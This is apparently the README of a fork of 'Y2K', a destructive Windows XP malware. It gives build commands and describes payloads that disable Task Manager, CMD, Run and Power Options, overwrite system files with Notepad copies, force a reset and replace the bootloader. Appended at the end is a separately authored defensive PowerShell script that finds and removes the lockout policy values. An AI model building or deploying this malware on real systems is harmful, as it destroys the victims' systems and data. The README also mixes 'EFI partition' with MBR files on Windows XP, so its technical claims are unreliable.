#+TITLE: Y2K GDI Malware

A fork of a [[https://github.com/LunzRh/Y2K.EXE][malware]] created by [[https://github.com/LunzRh][Jotaxisz]] with a reworked source structure (minor changes).

To run this malware you need a Windows XP machine with the date set to <2000-01-01> or <2000-01-02>, which changes the payload.

* Building
** On Linux
You will need *MinGW* and *Make*. You can pass the argument =CXX= to change the C++ compiler (the default is ~i686-w64-mingw-g++~) and =WINDRES= to change the default ~windres~ command (the default is ~i686-w64-mingw-windres~). Other arguments are =NASM= and =LD= for changing the nasm and ld commands.

You can change =CXX=, =WINDRES= and =LD= to ~x86_64-w64-mingw-g++~, ~x86_64-w64-mingw-windres~ and ~x86_64-w64-mingw32-ld~ respectively to build it natively for 64-bit environments.

*** Arch Linux
#+BEGIN_SRC shell
pacman -S make mingw-w64 nasm
make
#+END_SRC

*** Ubuntu
#+BEGIN_SRC shell
apt install make mingw-w64 nasm
make
#+END_SRC

You can also execute ~make clean~ to clean the =bin/= folder, the =.o= files in =res/=, and the =.bin= and =.o= files in the =mbr/= folder.

** On Windows
You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler and [[https://nasm.us/][NASM]]. Then run the commands:

#+BEGIN_SRC batch
windres -o res\resource.o res\resource.rc
nasm -o mbr\bootloader.bin mbr\bootloader.asm
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
#+END_SRC

* Bootloader
This project has a void function under the namespace called byeByeBoot; this function loads and writes the custom bootloader code to the EFI partition. The source code of the binary can be found [[src/mbr/][here]].

* Payloads
If you execute the malware on any date, it will always disable the Task Manager, CMD, Execute and Power Options.

** <2000-01-01>
This payload starts =res/alarm.wav=, then starts the GDI part and replaces multiple system files with copies of the Notepad executable. After the visual payload ends, the machine is force-reset and the bootloader payload starts.

** <2000-01-02>
This payload starts =res/jeff_syndicate_hip_hop.wav=.
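The Payloads section says every run disables Task Manager, CMD, Execute (Run) and Power Options. The following is an added recovery check, not code from this project: it assumes those effects are produced through the standard Explorer/System policy values (=DisableTaskMgr=, =DisableCMD=, =NoRun=, =NoClose=), which the README does not state, and that a PowerShell-capable host (XP SP3 with PowerShell 2.0, or a later Windows) is available to inspect the affected hives.

```powershell
# Added example (not part of the Y2K project): audit and optionally clear the
# policy values that typically back "Task Manager / CMD / Run / Power Options
# disabled". The registry locations are an assumption; the README only names
# the effects, not how they are set.
$Checks = @(
    @{ Name = 'Task Manager';   Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Value = 'DisableTaskMgr' },
    @{ Name = 'CMD';            Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Value = 'DisableCMD' },
    @{ Name = 'Run dialog';     Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Value = 'NoRun' },
    @{ Name = 'Shutdown/Power'; Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Value = 'NoClose' }
)

function Get-LockoutPolicyFindings {
    # One object per policy value that is present and non-zero in HKCU or HKLM.
    $findings = @()
    foreach ($hive in 'HKCU:', 'HKLM:') {
        foreach ($c in $Checks) {
            $key = Join-Path $hive $c.Path
            if (-not (Test-Path $key)) { continue }
            $prop = Get-ItemProperty -Path $key -Name $c.Value -ErrorAction SilentlyContinue
            if ($null -ne $prop -and $prop.($c.Value) -ne 0) {
                $findings += New-Object PSObject -Property @{
                    Feature = $c.Name; Key = $key; Value = $c.Value; Data = $prop.($c.Value)
                }
            }
        }
    }
    return $findings
}

function Repair-LockoutPolicy {
    # Removes the flagged values so the tools become usable again. HKLM entries
    # need an elevated session; use -WhatIf to preview without changing anything.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    foreach ($f in @(Get-LockoutPolicyFindings)) {
        if ($PSCmdlet.ShouldProcess("$($f.Key)\$($f.Value)", 'Remove policy value')) {
            Remove-ItemProperty -Path $f.Key -Name $f.Value
        }
    }
}

$found = @(Get-LockoutPolicyFindings)
if ($found.Count -eq 0) { 'No Task Manager/CMD/Run/Power lockout policies are set.' }
else { $found | Format-Table Feature, Key, Value, Data -AutoSize }
```

Run =Repair-LockoutPolicy -WhatIf= first to see which values would be removed; the check covers only these policy keys, not the file replacement or bootloader effects described above.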